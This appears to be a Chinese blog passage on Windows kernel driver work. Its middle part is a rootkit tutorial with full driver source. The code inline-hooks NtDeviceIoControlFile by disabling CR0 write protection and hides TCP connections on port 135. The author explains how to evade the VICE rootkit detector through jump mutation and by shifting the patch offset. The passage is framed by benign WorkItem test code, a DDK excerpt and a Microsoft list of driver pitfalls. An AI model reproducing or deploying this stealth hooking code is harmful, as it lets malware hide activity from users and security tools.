	KeWaitForSingleObject(&Kevent,
							Executive,
							KernelMode,
							FALSE,
							NULL
							);
	if ((*(PULONG)Context)<10){
		IoQueueWorkItem(pIo_WorkItem,
			IoWorkItemRoutine,
			DelayedWorkQueue,
			&i
			);
	}else{
		IoFreeWorkItem(pIo_WorkItem);
	}

}
//--------------------------------------------------------------------
运行结果:
My Driver Loaded!
in IoWorkItemRoutine 0
My Driver Unloaded!
in IoWorkItemRoutine 1
当驱动卸载后WorkItem继续执行,当然这个程序是有问题的,驱动卸载后WorkItem就一直wAit在哪了,thAt’s not the point :>  用WorkItem看样还是行的,cpu占用率很正常,但是循环就不行了,比如这样: 
VOID
IoWorkItemRoutine (
				   IN PDEVICE_OBJECT DeviceObject,
				   IN PVOID Context
				   )
{
	DbgPrint("in IoWorkItemRoutine %d\n",(*(PULONG)Context)++);
	IoQueueWorkItem(pIo_WorkItem,
			IoWorkItemRoutine,
			DelayedWorkQueue,
			&i
			);
}
//--------------------------------------------------------------------
输出结果是
in IoWorkItemRoutine 0
in IoWorkItemRoutine 1
in IoWorkItemRoutine 2
一直下去,系统也就不反应了
 
 
 
 
 
 
 
 
ddk中关于WorkItem
 
Kernel-Mode Driver Architecture: Windows DDK

System Worker Threads

A driver that requires delayed processing can use a work item, which contains a pointer to a driver callback routine that performs the actual processing. The driver queues the work item, and a system worker thread removes the work item from the queue and runs the driver’s callback routine. The system maintains a pool of these system worker threads, which are system threads that each process one work item at a time.

The driver associates a WorkItem callback routine with the work item. When the system worker thread processes the work item, it calls the associated WorkItem routine.

WorkItem routines run in a system thread context. If a driver dispatch routine can run in a user-mode thread context, that routine can call a WorkItem or routine to perform any operations that require a system thread context.

To use a work item, a driver performs the following steps:

  1. Allocate and initialize a new work item.

    The system uses an IO_WORKITEM structure to hold a work item. To allocate a new IO_WORKITEM structure and initialize it as a work item, the driver can call IoAllocateWorkItem.

  2. Associate a callback routine with the work item, and queue the work item so that it will be processed by a system worker thread.

    To associate a WorkItem routine with the work item and queue the work item, the driver should call IoQueueWorkItem.

  3. Once the work item is no longer required, free it.

    A work item that was allocated by IoAllocateWorkItem should be freed by IoFreeWorkItem.

    The work item can only be freed when the work item is not currently queued. The system dequeues the work item before it calls the work item’s callback routine, so IoFreeWorkItem can be called from within the callback.

Because the pool of system worker threads is a limited resource, WorkItem routines can be used only for operations that take a short period of time. If one of these routines runs for too long (if it contains an indefinite loop, for example), the system can deadlock. Therefore, if a driver requires long periods of delayed processing, it should instead call PsCreateSystemThread to create its own system thread.

在user mode的inline hook比较好用,因为很少有多线程的问题,所以可以采用把API前5字节改为跳转指令到自己的函数中,然后再改回原来的5个字节,调用原函数后在把前5个字节改为跳转指令为下次做好准备,过程大概如下
比如hook API(),我们的函数为myAPI()
修改API()前5字节为jmp xxxx(指向myAPI()),  1
        |
        |
         调用API()                   2
        |
        |
   跳转到myAPI()                      3
        |
        |
   (myAPI()中)改回原来的5字节          4
        |
        |
           …  一些操作                   5
        |
        |
   (myAPI()中)调用API()               6
        |
        |
           …. 一些操作                        7
        |
        |
   (myAPI()中)再次修改API前5字节为jmp xxxx(指向myAPI())        8
        |
        |
       结束                                                   9

这个过程在kernel就不那么方便了,很不稳定,因为系统服务是整个windows都会经常调用,n多线程,如果一个线程调用了被hook的系统服务,当运行到
4–8之间的时候,线程被切换,另一个线程再次调用相同的系统服务时就会出现系统服务没被hook的情况.如果正好在执行到4或8的时候被中断,在其他
线程调用系统服务的时候就可能是BSOD了 :)   如果说是提高irql或block其他线程,总不能每次都那样吧 听说是这样的hook很不稳定,自己倒还没试
过,不知道实际情况到底怎样

看到了Greg Hoglund的migsys.sys 的确是个好程序,里面的hook只需要改写一次就可以一直hook,稳定性很好,我在虚拟机上实验,没问题,不过扁要赶上改写那一次的时候被中断….哎 只能说点背migsys.c里在驱动加载后改写系统服务的前5个字节跳转到自己给出的hook 函数中,拿NtDeviceIoControlFile为例,hook函数为

__declspec(naked) my_function_detour_ntdeviceiocontrolfile()
{
    __asm
    {
        // exec missing instructions
        push ebp
            mov  ebp, esp
            push 0x01
            push dword ptr [ebp+0x2C]

            // jump to re-entry location in hooked function
            // this gets 'stamped' with the correct address
            // at runtime.
            //
            // we need to hard-code a far jmp, but the assembler
            // that comes with the DDK will not poop this out
            // for us, so we code it manually
            // jmp FAR 0x08:0xAAAAAAAA
            _emit 0xEA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0x08
            _emit 0x00
    }
}

注意到
__emit 0xEA
__emit 0xAA
__emit 0xAA
__emit 0xAA
__emit 0xAA
__emit 0×08
__emit 0×00
这是一句跳转语句 jmp 0008:AAAAAAAA
在驱动开始的时候就会寻找AAAAAAAA,把这里改写为被hook的NtDeviceIoControlFile+8的位置,这样在系统调用NtDeviceIoControlFile直接jmp到my_function_detour_ntdeviceiocontrolfile,接着执行
push ebp,esp
push 0×01
push dword ptr [ebp+0x2c]  (共8字节,不同版本windows的函数可能会有变化)
接下来jmp到NtDeviceIoControlFile+8,由于my_function_detour_ntdeviceiocontrolfile是__declspec(naked),
所以在进入后堆栈不会被改变,相当于执行了一个完整的NtDeviceIoControlFile.只不过前8个字节执行的地方不同 :>
我们可以在 push ebp前直接做些我们要的操作,不可以用局部变量,调用函数,对传入NtDeviceIoControlFile的参数做处理或者过滤之类的操作.
    但对于hook NtDeviceIoControlFile来实现隐藏端口和连接,我们是在调用成功后对结果进行过滤,而在jmp到NtDeviceIoControlFile+8后,我们就交出了程序的控制权.所以必须要让它执行完后再次转到我们的程序里.如果执行后要返回的话,就要用cAll指令,但cAll NtDeviceIoControlFile+8是不行的,被压入栈的返回地址放在了进栈的ebp的后面,乱了.这个办法行不通.
    肯定会有不同的方法来完成,我现在只想到了一个,并且希望让编译器帮着做大部分事,,我只用c就好了 ;)
模仿这种:

NTSTATUS NTAPI myNtDeviceIoControlFile(
                                IN HANDLE FileHandle,
                                IN HANDLE Event OPTIONAL,
                                IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                IN PVOID ApcContext OPTIONAL,
                   OUT PIO_STATUS_BLOCK IoStatusBlock,
                                       IN ULONG IoControlCode,
                   IN PVOID InputBuffer OPTIONAL,
                   IN ULONG InputBufferLength,
                   OUT PVOID OutputBuffer OPTIONAL,
                   IN ULONG OutputBufferLength
                    )
{
    NTSTATUS rc;
    rc = NtDeviceIoControlFile(
        FileHandle,
        Event,
        ApcRoutine,
        ApcContext,
        IoStatusBlock,
        IoControlCode,
        InputBuffer,
        InputBufferLength,
        OutputBuffer,
        OutputBufferLength
        );
...
}

然后我们可以对返回值做一些操作,就相当在我们的函数里调用了NtDeviceIoControlFile
NtDeviceIoControlFile有10个参数,调用时堆栈应该是这个样
Arg10
Arg9
Arg8
Arg7
Arg6
Arg5
Arg4
Arg3
Arg2
Arg1
ret Address
因为在系统调用的时候就已经压好了参数,所以我们的hook函数就不能自己再做了,要声名__declspec(naked),参数要和原函数一致.进入后模拟
cAll NtDeviceIoControlFile

__asm
{
    push OutputBufferLength
    push OutputBuffer
    push InputBufferLength
    push InputBuffer
    push IoControlCode
    push IoStatusBlock
    push ApcContext
    push ApcRoutine
    push Event
    push FileHandle
}

然后是ret Address,这个需要在运行时确定,用到了病毒中常用的定位的方法:
    cAll forwArd:
bAck:
    pop eAx
    …
forwArd:
    jmp bAck:

得到pop eAx所在的位置
在我们的程序中:

__asm
{
    //int 3
    jmp forwArd
bAck:

}

__asm
{
    // exec missing instructions
    push ebp
        mov  ebp, esp
        push 0x01
        push dword ptr [ebp+0x2C]

        // jump to re-entry location in hooked function
        // this gets 'stamped' with the correct address
        // at runtime.
        //
        // we need to hard-code a far jmp, but the assembler
        // that comes with the DDK will not poop this out
        // for us, so we code it manually
        // jmp FAR 0x08:0xAAAAAAAA
        _emit 0xEA
        _emit 0xAA
        _emit 0xAA
        _emit 0xAA
        _emit 0xAA
        _emit 0x08
        _emit 0x00
}
//////////////////////////
__asm
{
forwArd:
    call bAck
}

实现了一个完整的cAll NtDeviceIoControlFile :>

__declspec(naked) my_function_detour_ntdeviceiocontrolfile(IN HANDLE FileHandle,
                                                           IN HANDLE Event OPTIONAL,
                                                           IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                                           IN PVOID ApcContext OPTIONAL,
                                                           OUT PIO_STATUS_BLOCK IoStatusBlock,
                                                           IN ULONG IoControlCode,
                                                           IN PVOID InputBuffer OPTIONAL,
                                                           IN ULONG InputBufferLength,
                                                           OUT PVOID OutputBuffer OPTIONAL,
                                                           IN ULONG OutputBufferLength
                                                           )
{ 

    //NTSTATUS rc;                    这里不能用局部变量,因为NtDeviceIoControlFile被调用的    环境可不确定,可以用全局变量(我们的Driver用服务的方式加载会在nonpAgedpool中或者直接在nonpAgedPool中申请
    //TCP_REQUEST_QUERY_INFORMATION_EX req;
    //TCPAddrEntry* TcpTable;// = NULL;
    //TCPAddrExEntry* TcpExTable;// = NULL;
    //ULONG numconn;
    //ULONG i;
    __asm
    {

        push ebp
        mov ebp,esp
    }

    //DbgPrint("hooked\n");

    __asm
    {
        push OutputBufferLength
        push OutputBuffer
        push InputBufferLength
        push InputBuffer
        push IoControlCode
        push IoStatusBlock
        push ApcContext
        push ApcRoutine
        push Event
        push FileHandle
    }
    __asm
    {
        //int 3
        jmp forwArd
bAck:

    }

    __asm
    {
        //popfd
            //popad
        // exec missing instructions
            push ebp
            mov  ebp, esp
            push 0x01
            push dword ptr [ebp+0x2C]

            // jump to re-entry location in hooked function
            // this gets 'stamped' with the correct address
            // at runtime.
            //
            // we need to hard-code a far jmp, but the assembler
            // that comes with the DDK will not poop this out
            // for us, so we code it manually
            // jmp FAR 0x08:0xAAAAAAAA
            _emit 0xEA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0x08
            _emit 0x00
    }
//////////////////////////
    __asm
    {
forwArd:
        call bAck
    }
    /*
    __asm
        {
            mov esp,ebp
            pop ebp
            ret 0x28
    }
    */
    //DbgPrint("once here :>\n");

    __asm
    {
        mov rc,eax
    }

    if(IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX){
        //return(rc);
        __asm
        {
            mov esp,ebp
            pop ebp
            mov eax,rc
            ret 0x28
        }
    } 

    //TcpTable = NULL;
    //TcpExTable = NULL;

    if( NT_SUCCESS( rc ) ) {
        req.ID.toi_entity.tei_entity = CO_TL_ENTITY;
        req.ID.toi_entity.tei_instance = 0;
        req.ID.toi_class = INFO_CLASS_PROTOCOL;
        req.ID.toi_type = INFO_TYPE_PROVIDER;
        req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID; 

        if(sizeof(TDIObjectID) == RtlCompareMemory(InputBuffer,&req,sizeof(TDIObjectID))){
            numconn = IoStatusBlock->Information/sizeof(TCPAddrEntry);
            TcpTable = (TCPAddrEntry*)OutputBuffer; 

            for( i=0; i<numconn; i++ ){
                if( ntohs(TcpTable[i].tae_ConnLocalPort) == 135 ) {
                    //判断是否是最后一个
                    if (i != numconn -1){
                        RtlCopyMemory((TcpTable+i),(TcpTable+i+1),((numconn-i-1)*sizeof(TCPAddrEntry)));
                        numconn--;
                        i--;
                    }else{
                        numconn--;
                    }
                }
            }
            IoStatusBlock->Information = numconn*sizeof(TCPAddrEntry);
            //return(rc);
            __asm
            {
                mov esp,ebp
                pop ebp
                mov eax,rc
                ret 0x28
            }
        }
    } 

    //return(rc);
    __asm
    {
        mov esp,ebp
        pop ebp
        mov eax,rc
        ret 0x28
    }

}

声名__declspec(naked)的函数是不能用return语句的,因此这个工作得自己做 :>

上面的方法相比直接改SSDT就隐蔽些了,但被vice查出来,太容易被发现,当然可以用变形的方法来替换jmp,比如push xxxx,ret 其他的很多方法,虑到除了变形外还可以把改写的位置放在其他位置上,比如从被hook的函数开始的第8个字节的几个字节改写成jmp xxxx,位置是不固定的,要看具体情况而定,比如
NtDeviceIoControlFile,

nt!NtDeviceIoControlFile:
805997c4 55               push    ebp
805997c5 8bec             mov     ebp,esp
805997c7 6a01             push    0x1
805997c9 ff752c           push    dword ptr [ebp+0x2c]
805997cc ff7528           push    dword ptr [ebp+0x28]
805997cf ff7524           push    dword ptr [ebp+0x24]
805997d2 ff7520           push    dword ptr [ebp+0x20]
805997d5 ff751c           push    dword ptr [ebp+0x1c]
805997d8 ff7518           push    dword ptr [ebp+0x18]
805997db ff7514           push    dword ptr [ebp+0x14]
805997de ff7510           push    dword ptr [ebp+0x10]
805997e1 ff750c           push    dword ptr [ebp+0xc]
805997e4 ff7508           push    dword ptr [ebp+0x8]
805997e7 e8e731ffff       call    nt!IopXxxControlFile (8058c9d3)
805997ec 5d               pop     ebp
805997ed c22800           ret     0x28
805997f0 0f862334ffff     jbe     nt!IopXxxControlFile+0x570 (8058cc19)
...

前面这么多push 语句都可以用来改成jmp xxxx或类似的语句,直要不让它执行到cAll就行了,,因为一但cAll就做出了很多操作,不好往回改了
比如选定
805997cc ff7528           push    dword ptr [ebp+0x28]
805997cf ff7524           push    dword ptr [ebp+0x24]
805997d2 ff7520           push    dword ptr [ebp+0x20]
这9个字节改写为0xEA, 0×44, 0×33, 0×22, 0×11, 0×08, 0×00, 0×90,0×90 11223344被换成我们的函数的地址,一定要用整数条语句的空间
当调用NtDeviceIoControlFile后跳转到我们的函数时,实际上已经执行了这几条语句了
805997c4 55               push    ebp
805997c5 8bec             mov     ebp,esp
805997c7 6a01             push    0×1
805997c9 ff752c           push    dword ptr [ebp+0x2c]
所以要执行对应相反的语句来恢复堆栈

__asm
{
    add esp,8
    mov esp,ebp
    pop ebp
}

然后和原来的方法一样模拟cAll NtDeviceIoControlFile的过程,把丢掉的语句都补上.
在自己的xp sp1下vice2.0通过,结合变形,效果会更好吧 :>
代码如下:

////////////inline_hook.c///////////////
#include <ntddk.h>
#include "hideport_hook_ZwDeviceIoControlFile.h"

NTSTATUS rc;
TCP_REQUEST_QUERY_INFORMATION_EX req;
TCPAddrEntry* TcpTable = NULL;
TCPAddrExEntry* TcpExTable = NULL;
ULONG numconn;
ULONG i;
//--------------------------------------------------------------------
NTSYSAPI
NTSTATUS
NTAPI
NtDeviceIoControlFile(
                      IN HANDLE hFile,
                      IN HANDLE hEvent OPTIONAL,
                      IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
                      IN PVOID IoApcContext OPTIONAL,
                      OUT PIO_STATUS_BLOCK pIoStatusBlock,
                      IN ULONG DeviceIoControlCode,
                      IN PVOID InBuffer OPTIONAL,
                      IN ULONG InBufferLength,
                      OUT PVOID OutBuffer OPTIONAL,
                      IN ULONG OutBufferLength
                      );

NTSTATUS CheckFunctionBytesNtDeviceIoControlFile()
{
    int i=0;
    char *p = (char *)NtDeviceIoControlFile;

    //The beginning of the NtDeviceIoControlFile function
    //should match:
    //55  PUSH EBP
    //8BEC  MOV EBP, ESP
    //6A01  PUSH 01
    //FF752C PUSH DWORD PTR [EBP + 2C]

    char c[] = { 0x55, 0x8B, 0xEC, 0x6A, 0x01, 0xFF, 0x75, 0x2C };

    while(i<8)
    {
        DbgPrint(" - 0x%02X ", (unsigned char)p[i]);
        DbgPrint("\n");
        if(p[i] != c[i])
        {
            return STATUS_UNSUCCESSFUL;
        }
        i++;
    }
    return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
// naked functions have no prolog/epilog code - they are functionally like the
// target of a goto statement
__declspec(naked) NTAPI my_function_detour_ntdeviceiocontrolfile(IN HANDLE FileHandle,
                                                           IN HANDLE Event OPTIONAL,
                                                           IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                                           IN PVOID ApcContext OPTIONAL,
                                                           OUT PIO_STATUS_BLOCK IoStatusBlock,
                                                           IN ULONG IoControlCode,
                                                           IN PVOID InputBuffer OPTIONAL,
                                                           IN ULONG InputBufferLength,
                                                           OUT PVOID OutputBuffer OPTIONAL,
                                                           IN ULONG OutputBufferLength
                                                           )
{ 

    //NTSTATUS rc;
    //TCP_REQUEST_QUERY_INFORMATION_EX req;
    //TCPAddrEntry* TcpTable;// = NULL;
    //TCPAddrExEntry* TcpExTable;// = NULL;
    //ULONG numconn;
    //ULONG i;
    __asm
    {
        add esp,8
        mov esp,ebp
        pop ebp
    }

    __asm
    {
        push ebp
        mov ebp,esp
        pushad
    }

    //DbgPrint("hooked\n");

    __asm
    {
        push OutputBufferLength
        push OutputBuffer
        push InputBufferLength
        push InputBuffer
        push IoControlCode
        push IoStatusBlock
        push ApcContext
        push ApcRoutine
        push Event
        push FileHandle
    }
    __asm
    {
        //int 3
        jmp forwArd
bAck:

    }

    __asm
    {
        // exec missing instructions
            push ebp
            mov  ebp, esp
            push 0x01
            push dword ptr [ebp+0x2C]
            push dword ptr [ebp+0x28]
            push dword ptr [ebp+0x24]
            push dword ptr [ebp+0x20]

            // jump to re-entry location in hooked function
            // this gets 'stamped' with the correct address
            // at runtime.
            //
            // we need to hard-code a far jmp, but the assembler
            // that comes with the DDK will not poop this out
            // for us, so we code it manually
            // jmp FAR 0x08:0xAAAAAAAA
            _emit 0xEA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0x08
            _emit 0x00
    }
//////////////////////////
    __asm
    {
forwArd:
        call bAck
    }
    //DbgPrint("once here :>\n");
    __asm
    {
        mov rc,eax
    }

    if(IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX){
        //return(rc);
        __asm
        {
            popad
            mov esp,ebp
            pop ebp
            mov eax,rc
            ret 0x28
        }
    } 

    if( NT_SUCCESS( rc ) ) {
        req.ID.toi_entity.tei_entity = CO_TL_ENTITY;
        req.ID.toi_entity.tei_instance = 0;
        req.ID.toi_class = INFO_CLASS_PROTOCOL;
        req.ID.toi_type = INFO_TYPE_PROVIDER;
        req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID; 

        if(sizeof(TDIObjectID) == RtlCompareMemory(InputBuffer,&req,sizeof(TDIObjectID))){
            numconn = IoStatusBlock->Information/sizeof(TCPAddrEntry);
            TcpTable = (TCPAddrEntry*)OutputBuffer; 

            for( i=0; i<numconn; i++ ){
                if( ntohs(TcpTable[i].tae_ConnLocalPort) == 135 ) {
                    //判断是否是最后一个
                    if (i != numconn -1){
                        RtlCopyMemory( (TcpTable+i), (TcpTable+i+1), ((numconn-i-1)*sizeof(TCPAddrEntry)) );
                        numconn--;
                        i--;
                    }else{
                        numconn--;
                    }
                }
            }
            IoStatusBlock->Information = numconn*sizeof(TCPAddrEntry);
            //return(rc);
            __asm
            {
                popad
                mov esp,ebp
                pop ebp
                mov eax,rc
                ret 0x28
            }
        } 

        req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_EX_ID; 

        if(sizeof(TDIObjectID) == RtlCompareMemory(InputBuffer,&req,sizeof(TDIObjectID))){
            numconn = IoStatusBlock->Information/sizeof(TCPAddrExEntry);
            TcpExTable = (TCPAddrExEntry*)OutputBuffer; 

            for( i=0; i<numconn; i++ ) {
                if( ntohs(TcpExTable[i].tae_ConnLocalPort) == 135 ) {
                    if (i != numconn){
                        RtlCopyMemory( (TcpExTable+i), (TcpExTable+i+1), ((numconn-i-1)*sizeof(TCPAddrExEntry)) );
                        numconn--;
                        i--;
                    }else{
                        numconn--;
                    }
                }
            } 

            IoStatusBlock->Information = numconn*sizeof(TCPAddrExEntry);
            //return(rc);
            __asm
            {
                popad
                mov esp,ebp
                pop ebp
                mov eax,rc
                ret 0x28
            }
        }
    } 

    //return(rc);
    __asm
    {
        popad
        mov esp,ebp
        pop ebp
        mov eax,rc
        ret 0x28
    }

}
//--------------------------------------------------------------------
VOID DetourFunctionNtDeviceIoControlFile()
{
    char *actual_function = (char *)NtDeviceIoControlFile;
    unsigned long detour_address;
    unsigned long reentry_address;
    int i = 0;

    // assembles to jmp far 0008:11223344 where 11223344 is address of
    // our detour function, plus one NOP to align up the patch
    char newcode[] = { 0xEA, 0x44, 0x33, 0x22, 0x11, 0x08, 0x00, 0x90,0x90 };

    // reenter the hooked function at a location past the overwritten opcodes
    // alignment is, of course, very important here
    reentry_address = ((unsigned long)NtDeviceIoControlFile) + 17; 

    detour_address = (unsigned long)my_function_detour_ntdeviceiocontrolfile;

    // stamp in the target address of the far jmp
    *( (unsigned long *)(&newcode[1]) ) = detour_address;

    // now, stamp in the return jmp into our detour
    // function
    for(i=0;i<200;i++){
        if( (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i]) &&
            (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i+1]) &&
            (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i+2]) &&
            (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i+3]))
        {
            // we found the address 0xAAAAAAAA
            // stamp it w/ the correct address
            *( (unsigned long *)(&((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i]) ) = reentry_address;
            break;
        }
    }

    //TODO, raise IRQL

    //overwrite the bytes in the kernel function
    //to apply the detour jmp
    _asm
    {
        CLI //dissable interrupt
        MOV EAX, CR0 //move CR0 register into EAX
        AND EAX, NOT 10000H //disable WP bit
        MOV CR0, EAX //write register back
    }
    for(i=8;i < 17;i++)
    {
        actual_function[i] = newcode[i-8];
    }
    _asm
    {
        MOV EAX, CR0 //move CR0 register into EAX
        OR EAX, 10000H //enable WP bit
        MOV CR0, EAX //write register back
        STI //enable interrupt
    } 

    //TODO, drop IRQL
}

VOID UnDetourFunction()
{
    //TODO!
}
//--------------------------------------------------------------------
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
    DbgPrint("My Driver Unloaded!\n");
    UnDetourFunction();
}
//--------------------------------------------------------------------
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
    DbgPrint("My Driver Loaded!");

    // TODO!! theDriverObject->DriverUnload = OnUnload;

    if(STATUS_SUCCESS != CheckFunctionBytesNtDeviceIoControlFile()){
        DbgPrint("Match Failure on NtDeviceIoControlFile!\n");
        return STATUS_UNSUCCESSFUL;
    }

    DetourFunctionNtDeviceIoControlFile();

    return STATUS_SUCCESS;
}
//--------------------------------------------------------------------

//////////hideport_hook_ZwDeviceIoControlFile.h/////////////
#include <ntddk.h>

//--------------------------------------------------------------------
NTSYSAPI
NTSTATUS
NTAPI
ZwDeviceIoControlFile(
                      IN HANDLE FileHandle,
                      IN HANDLE Event OPTIONAL,
                      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                      IN PVOID ApcContext OPTIONAL,
                      OUT PIO_STATUS_BLOCK IoStatusBlock,
                      IN ULONG IoControlCode,
                      IN PVOID InputBuffer OPTIONAL,
                      IN ULONG InputBufferLength,
                      OUT PVOID OutputBuffer OPTIONAL,
                      IN ULONG OutputBufferLength
                      );
NTSTATUS NTAPI
myZwDeviceIoControlFile(
                        IN HANDLE FileHandle,
                        IN HANDLE Event OPTIONAL,
                        IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                        IN PVOID ApcContext OPTIONAL,
                        OUT PIO_STATUS_BLOCK IoStatusBlock,
                        IN ULONG IoControlCode,
                        IN PVOID InputBuffer OPTIONAL,
                        IN ULONG InputBufferLength,
                        OUT PVOID OutputBuffer OPTIONAL,
                        IN ULONG OutputBufferLength
                        );
typedef NTSTATUS (NTAPI *ZWDEVICEIOCONTROLFILE)(
                                                IN HANDLE FileHandle,
                                                IN HANDLE Event OPTIONAL,
                                                IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                                IN PVOID ApcContext OPTIONAL,
                                                OUT PIO_STATUS_BLOCK IoStatusBlock,
                                                IN ULONG IoControlCode,
                                                IN PVOID InputBuffer OPTIONAL,
                                                IN ULONG InputBufferLength,
                                                OUT PVOID OutputBuffer OPTIONAL,
                                                IN ULONG OutputBufferLength
                                                );
//--------------------------------------------------------------------
// jiurl // from addrconv.cpp
#define ntohs(s) ( ( ((s) >> 8) & 0x00FF ) | ( ((s) << 8) & 0xFF00 ) )


// jiurl // from tcpioctl.h tdiinfo.h tdistat.h
#define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003

//* Structure of an entity ID.
typedef struct TDIEntityID {
    ULONG tei_entity;
    ULONG tei_instance;
} TDIEntityID; 

//* Structure of an object ID.
typedef struct TDIObjectID {
    TDIEntityID toi_entity;
    ULONG toi_class;
    ULONG toi_type;
    ULONG toi_id;
} TDIObjectID; 

#define CONTEXT_SIZE 16
//
// QueryInformationEx IOCTL. The return buffer is passed as the OutputBuffer
// in the DeviceIoControl request. This structure is passed as the
// InputBuffer.
//
struct tcp_request_query_information_ex {
    TDIObjectID ID; // object ID to query.
    ULONG_PTR Context[CONTEXT_SIZE/sizeof(ULONG_PTR)]; // multi-request context. Zeroed
    // for the first request.
}; 

typedef struct tcp_request_query_information_ex
TCP_REQUEST_QUERY_INFORMATION_EX,
*PTCP_REQUEST_QUERY_INFORMATION_EX; 

#define CO_TL_ENTITY 0x400
#define INFO_CLASS_PROTOCOL 0x200
#define INFO_TYPE_PROVIDER 0x100

//--------------------------------------------------------------------

typedef struct TCPSNMPInfo {
    ULONG tcpsi_RtoAlgorithm;
    ULONG tcpsi_RtoMin;
    ULONG tcpsi_RtoMax;
    ULONG tcpsi_MaxConn;
    ULONG tcpsi_ActiveOpens;
    ULONG tcpsi_PassiveOpens;
    ULONG tcpsi_AttemptFails;
    ULONG tcpsi_EstabResets;
    ULONG tcpsi_CurrEstab;
    ULONG tcpsi_InSegs;
    ULONG tcpsi_OutSegs;
    ULONG tcpsi_RetransSegs;
    ULONG tcpsi_unknown1;
    ULONG tcpsi_unknown2;
    ULONG tcpsi_numconn;
} TCPSNMPInfo; 

#define tcpRtoAlgorithm_other 1 // none of the following
#define tcpRtoAlgorithm_constant 2 // a constant rto
#define tcpRtoAlgorithm_rsre 3 // MIL-STD-1778, Appendix B
#define tcpRtoAlgorithm_vanj 4 // Van Jacobson's algorithm 

#define TCP_MIB_STATS_ID 1
#define TCP_MIB_ADDRTABLE_ENTRY_ID 0x101
#define TCP_MIB_ADDRTABLE_ENTRY_EX_ID 0x102


typedef struct TCPAddrEntry {
    ULONG tae_ConnState;
    ULONG tae_ConnLocalAddress;
    ULONG tae_ConnLocalPort;
    ULONG tae_ConnRemAddress;
    ULONG tae_ConnRemPort;
} TCPAddrEntry; 

#define tcpConnState_closed 1
#define tcpConnState_listen 2
#define tcpConnState_synSent 3
#define tcpConnState_synReceived 4
#define tcpConnState_established 5
#define tcpConnState_finWait1 6
#define tcpConnState_finWait2 7
#define tcpConnState_closeWait 8
#define tcpConnState_lastAck 9
#define tcpConnState_closing 10
#define tcpConnState_timeWait 11
#define tcpConnState_deleteTCB 12

typedef struct TCPAddrExEntry {
    ULONG tae_ConnState;
    ULONG tae_ConnLocalAddress;
    ULONG tae_ConnLocalPort;
    ULONG tae_ConnRemAddress;
    ULONG tae_ConnRemPort;
    ULONG pid;
} TCPAddrExEntry; 
2005年11月05日

INFO: Tips for Windows NT Driver Developers — Things to Avoid

Article ID : 186775
Last Review : July 27, 2004
Revision : 1.0
This article was previously published under Q186775

SUMMARY

Following are some tips for creating Windows NT device drivers. The tips presented apply to all technologies. You can also use this as a checklist for troubleshooting driver problems.

You need to have a basic knowledge of Windows NT architecture and some device driver development experience to use the information presented below effectively. For more information on device driver development, please see the Windows NT device driver kit (DDK), which is available through MSDN Professional membership.


MORE INFORMATION

Following is a list of things that developers should avoid when working with Windows NT device drivers:


1. Never return STATUS_PENDING from a dispatch routine without marking the I/O request packet (IRP) pending (IoMarkIrpPending).
2. Never call KeSynchronizeExecution from an interrupt service routine (ISR). It will deadlock your system.
3. Never set DeviceObject->Flags to both DO_BUFFERED_IO and DO_DIRECT_IO. It can confuse the system and eventually lead to fatal error. Also, never set METHOD_BUFFERED, METHOD_NEITHER, METHOD_IN_DIRECT or METHOD_OUT_DIRECT in DeviceObject->Flags, because these values are only used in defining IOCTLs.
4. Never allocate dispatcher objects from a paged pool. If you do, it will cause occasional system bugchecks.
5. Never allocate memory from paged pool, or access memory in paged pool, while running at IRQL >= DISPATCH_LEVEL. It is a fatal error.
6. Never wait on a kernel dispatcher object for a nonzero interval at IRQL >= DISPATCH_LEVEL. It is a fatal error.
7. Never call any function that causes the calling thread to wait directly or indirectly while executing at IRQL >= DISPATCH_LEVEL. It is a fatal error.
8. Never lower the interrupt request level (IRQL) below the level at which your top-level routine has been invoked.
9. Never call KeLowerIrql() if you haven’t called KeRaiseIrql().
10. Never stall a processor (KeStallExecutionProcessor) longer than 50 microseconds.
11. Never hold any spin locks longer than necessary. For better overall system performance, do not hold any system-wide spin locks longer than 25 microseconds.
12. Never call KeAcquireSpinLock and KeReleaseSpinLock, or KeAcquireSpinLockAtDpcLevel and KeReleaseSpinLockFromDpcLevel, while running at IRQL greater than DISPATCH_LEVEL.
13. Never release a spin lock that was acquired with KeAcquireSpinLock by calling KeReleaseSpinLockFromDpcLevel, because the original IRQL will not be restored.
14. Never call KeAcquireSpinLock and KeReleaseSpinLock or any other routine that uses an executive spin lock from an ISR or SynchCritSection routine(s).
15. Never forget to clear DO_DEVICE_INITIALIZING flag when you create a device object in a routine other than DriverEntry.
16. Never queue a deferred procedure call (DPC) object (using KeInsertQueueDpc) with multiple threads on different processors simultaneously. It can lead to fatal error.
17. Never deallocate a periodic timer from a CutomerTimerDPC routine. You can deallocate nonperiodic timers from a DPC routine.
18. Never pass the same DPC pointer to KeSetTimer, or KeSetTimerEx (CustomTimerDpc) and KeInsertQueueDpc (CustomDpc), because it causes race conditions.
19. Never call IoStartNextPacket while holding a spin lock. It can deadlock your system.
20. Never call IoCompleteRequest while holding a spin lock. It can deadlock your system.
21. Never call IoCompleteRequest without setting the completion routine to NULL if your driver sets the completion routine.
